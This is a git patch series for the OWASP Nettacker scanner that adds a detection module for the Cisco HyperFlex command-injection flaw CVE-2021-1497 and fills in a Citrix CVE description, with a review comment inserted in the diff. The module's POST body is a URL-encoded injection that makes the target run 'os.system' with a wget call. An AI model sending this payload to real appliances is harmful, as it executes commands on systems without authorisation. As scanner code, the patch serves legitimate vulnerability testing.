From 653f95dc8ae54076e07b959081d1335070d58736 Mon Sep 17 00:00:00 2001
From: Ehsan Nezami
Date: Sat, 2 Oct 2021 18:41:21 +0400
Subject: [PATCH 1/2] add new module cisco hyperflex cve 2021 1497
---
.../vuln/cisco_hyperflex _cve_2021_1497.yaml | 57 +++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 modules/vuln/cisco_hyperflex _cve_2021_1497.yaml
diff --git a/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml b/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml
new file mode 100644
index 000000000..a1fb1bcd7
--- /dev/null
+++ b/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml
@@ -0,0 +1,57 @@
+info:
+ name: cisco_hyperflex_cve_2021_1497_vuln
+ author: OWASP Nettacker Team
+ severity: 9.8
+ description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-1497
+ - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
+ profiles:
+ - vuln
+ - vulnerability
+ - http
+ - high_severity
+ - cve
+ - hyperflex
+ - cisco
+
+payloads:
+ - library: http
+ verify: false
+ timeout: 10
+ cert: ""
+ stream: false
+ proxies: ""
+ steps:
+ - method: post
+ headers:
+ Accept: "*/*"
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: "{user_agent}"
+ allow_redirects: false
+ url:
+ nettacker_fuzzer:
+ input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+ prefix: ""
+ suffix: ""
+ interceptors:
+ data:
+ paths:
+ - 'auth/change'
+ - 'auth'
+ schema:
+ - "http"
+ - "https"
+ ports:
+ - 80
+ - 443
+ data: username=root&password=123%5C%22%2C%5C%22%246%24%24%5C%22%29%29%3Bimport%20os%3Bos.system%28%5C%22wget%20http%3A%2F%2F%7B%7B{target}%7D%7D%5C%22%29%3Bprint%28crypt.crypt%28%5C%22
+ response:
+ condition_type: and
+ conditions:
+ status_code:
+ regex: "200"
+ reverse: false
+ content:
+ regex: "http"
+ reverse: false
From eb3f19bbf56bf9397d36b24aab34629070081b39 Mon Sep 17 00:00:00 2001
From: Ehsan Nezami
Date: Sat, 2 Oct 2021 18:45:34 +0400
Subject: [PATCH 2/2] add description and ref cve 2019 19781
---
modules/vuln/citrix_cve_2019_19781.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/modules/vuln/citrix_cve_2019_19781.yaml b/modules/vuln/citrix_cve_2019_19781.yaml
index 27dd32457..ab9884302 100644
--- a/modules/vuln/citrix_cve_2019_19781.yaml
+++ b/modules/vuln/citrix_cve_2019_19781.yaml
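Review bot: The response check at the end of the new HyperFlex module (`status_code` regex `"200"` and `content` regex `"http"`) matches almost any page that answers 200, so a host will be reported as vulnerable to CVE-2021-1497 whenever `auth` or `auth/change` returns ordinary HTML; nothing in the condition is tied to the command the `data` body injects. The `content` regex should be a string that only the affected endpoint returns, e.g. `regex: "MARKER_FROM_VULNERABLE_RESPONSE"` (placeholder; the expected response is not shown in this patch). Because the POST body makes the scanned appliance execute a command rather than only fingerprinting it, the `description` should state that the check is intrusive, so it is not pulled into default or passive scan profiles. The file path `modules/vuln/cisco_hyperflex _cve_2021_1497.yaml` also contains a space before `_cve`, which does not match `name: cisco_hyperflex_cve_2021_1497_vuln` and will presumably break selection by module name; rename it to `cisco_hyperflex_cve_2021_1497.yaml`.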
@@ -2,8 +2,9 @@ info: name: citrix_cve_2019_19781_vuln author: OWASP Nettacker Team severity: 8 - description: - reference: + description: CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance + reference: + - https://support.citrix.com/article/CTX267027 profiles: - vuln - vulnerability